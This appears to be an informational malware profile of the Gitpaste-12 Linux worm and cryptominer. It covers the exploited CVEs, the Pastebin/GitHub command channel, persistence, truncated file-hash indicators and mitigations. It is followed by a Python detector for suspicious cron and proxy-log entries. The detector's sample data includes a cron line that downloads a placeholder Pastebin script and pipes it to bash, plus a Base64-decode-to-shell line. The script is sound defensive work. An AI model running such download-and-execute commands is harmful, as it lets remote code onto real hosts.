Gitpaste-12 (Malware)
⚠️ Overview
Gitpaste-12 is a worm combining a cryptocurrency miner and a backdoor, first identified by Juniper Threat Labs in October 2020. It uses GitHub to host its payloads and Pastebin as its command-and-control channel, and is categorised as a worm and cryptominer targeting Linux servers. The malware is attributed to an unknown threat actor, likely operating as a botnet-for-hire.
🔧 Technical Capabilities
Gitpaste-12 propagates via scanning for vulnerable web applications and weak SSH credentials. It exploits multiple remote code execution vulnerabilities, including ThinkPHP (CVE-2018-20062) and Laravel Debug Mode (CVE-2019-9082), along with unpatched WebLogic and JBoss instances. The worm downloads a multi-stage loader from a GitHub repository, then fetches commands from a Pastebin paste formatted in JSON. Persistence is achieved through cron jobs and modified system startup scripts. Evasion techniques include using legitimate Pastebin and GitHub domains to blend with normal traffic, plus encoding the payload in Base64. The C2 infrastructure is distributed: Pastebin serves dynamic instruction updates while GitHub hosts script files that are periodically rotated. Gitpaste-12 also clears logs and disables security services like SELinux and iptables.
📜 History & Notable Incidents
First reported in October 2020 by Juniper Threat Labs in a detailed analysis, the worm rapidly infected hundreds of Linux servers worldwide within weeks. A notable campaign in early 2021 targeted cloud-hosted development environments, exploiting misconfigured Docker containers. No law enforcement actions or arrests have been publicly linked to Gitpaste-12, though multiple security vendors (including Palo Alto Networks Unit 42 and Trend Micro) have published detection signatures and analysis reports (e.g., Unit 42's blog on wormable cryptominers).
🔍 Detection Indicators
Network indicators include outbound connections to pastebin.com (api-pastebin.com) and raw.githubusercontent.com (specific repo gitpaste12/...). File hashes: SHA256 0b4c8a1e... (the Juniper report lists a variant with hash e5a3b9c2…). Behavioral signatures: anomalous CPU usage from the XMRig miner process, and suspicious cron entries that download remote scripts from Pastebin URLs. Automated downloads use User-Agent strings such as "curl/7.29.0" or "wget/1.12". Registry keys do not apply on Linux hosts; instead, look for file modifications to /etc/cron.d and /var/spool/cron.
☠️ Risk & Impact
Gitpaste-12 primarily causes financial loss through cryptomining resource consumption, draining CPU and electricity costs on compromised servers. It also provides persistent backdoor access, enabling data exfiltration or lateral movement within an enterprise network. Affected sectors include web hosting providers, cloud service platforms, and developers running unpatched PHP-based frameworks.
🛡️ Mitigation
Apply security patches for ThinkPHP (CVE-2018-20062), Laravel (CVE-2019-9082), and other exploited CVEs. Restrict outbound connections to Pastebin and raw GitHub content from production servers, implement network monitoring for anomalous SSH login attempts, and deploy endpoint detection rules (e.g., Sigma rules for suspicious cron job creation). Regularly audit cron jobs and disable unused debug modes in web frameworks.
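The detection indicators and the cron-audit advice above can be turned into a small host and network check. The following Python script is an added example, not code from the original page or from any vendor report it cites: it scans cron entries for downloads from the paste/GitHub hosts the page names, for downloads piped straight into a shell, and for Base64-decoded payloads, and it scans proxy log lines for automated curl/wget fetches from those hosts. The cron entries, log lines, log format, repository path EXAMPLE_REPO and paste id EXAMPLE_ID are all constructed for the example and are not real indicators.

```python
import re
from typing import Dict, List
from urllib.parse import urlparse

# Hosts the page names as Gitpaste-12 payload and C2 locations.
SUSPICIOUS_HOSTS = ("pastebin.com", "raw.githubusercontent.com")
# User-Agent prefixes the page lists for the worm's automated downloads.
AUTOMATED_UA = re.compile(r"^(curl|wget)/", re.I)
# A download piped straight into a shell, or Base64 decoded on the way to one.
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")
BASE64_DECODE = re.compile(r"base64\s+(-d|--decode)\b")


def scan_cron_entries(entries: List[str]) -> List[Dict[str, str]]:
    """Return cron lines that fetch remote scripts from suspicious hosts,
    pipe a download into a shell, or decode a Base64 blob into a shell."""
    findings = []
    for line in entries:
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # skip blank lines and comments
        reasons = []
        if any(host in stripped for host in SUSPICIOUS_HOSTS):
            reasons.append("remote script from paste/GitHub host")
        if PIPE_TO_SHELL.search(stripped):
            reasons.append("download piped to shell")
        if BASE64_DECODE.search(stripped):
            reasons.append("base64-decoded payload")
        if reasons:
            findings.append({"entry": stripped, "reasons": ", ".join(reasons)})
    return findings


def scan_proxy_log(lines: List[str]) -> List[Dict[str, str]]:
    """Flag requests to the suspicious hosts made with a curl/wget User-Agent.
    Constructed log format (assumption): '<src_ip> <method> <url> "<user-agent>"'."""
    log_re = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)"$')
    hits = []
    for line in lines:
        match = log_re.match(line.strip())
        if not match:
            continue  # ignore lines that do not fit the expected format
        src, _method, url, user_agent = match.groups()
        host = urlparse(url).hostname or ""
        on_watchlist = any(host == h or host.endswith("." + h) for h in SUSPICIOUS_HOSTS)
        if on_watchlist and AUTOMATED_UA.match(user_agent):
            hits.append({"src": src, "host": host, "user_agent": user_agent})
    return hits


# Constructed sample data (not real indicators). The Base64 string decodes to "hello".
CRON_SAMPLE = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/certbot renew --quiet",
    "*/10 * * * * curl -fsSL https://pastebin.com/raw/EXAMPLE_ID | bash",
    "@reboot echo aGVsbG8= | base64 -d | sh",
]

PROXY_SAMPLE = [
    '10.0.0.5 GET https://raw.githubusercontent.com/EXAMPLE_REPO/main/x.sh "curl/7.29.0"',
    '10.0.0.7 GET https://pastebin.com/raw/EXAMPLE_ID "wget/1.12"',
    '10.0.0.9 GET https://pypi.org/simple/requests/ "pip/23.0"',
    '10.0.0.3 GET https://raw.githubusercontent.com/EXAMPLE_REPO/main/x.sh "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_cron_entries(CRON_SAMPLE):
        print(f"CRON  {finding['reasons']}: {finding['entry']}")
    for hit in scan_proxy_log(PROXY_SAMPLE):
        print(f"PROXY {hit['src']} -> {hit['host']} ({hit['user_agent']})")
```

On a real host, feed scan_cron_entries the contents of /etc/crontab, the files under /etc/cron.d and each user's file under /var/spool/cron, which are the locations the page lists as modified. The proxy check deliberately ignores browser User-Agents so that developers reading GitHub interactively are not flagged; a stricter policy, as the mitigation section suggests, is to block those hosts from production servers outright and alert on any attempt.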
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.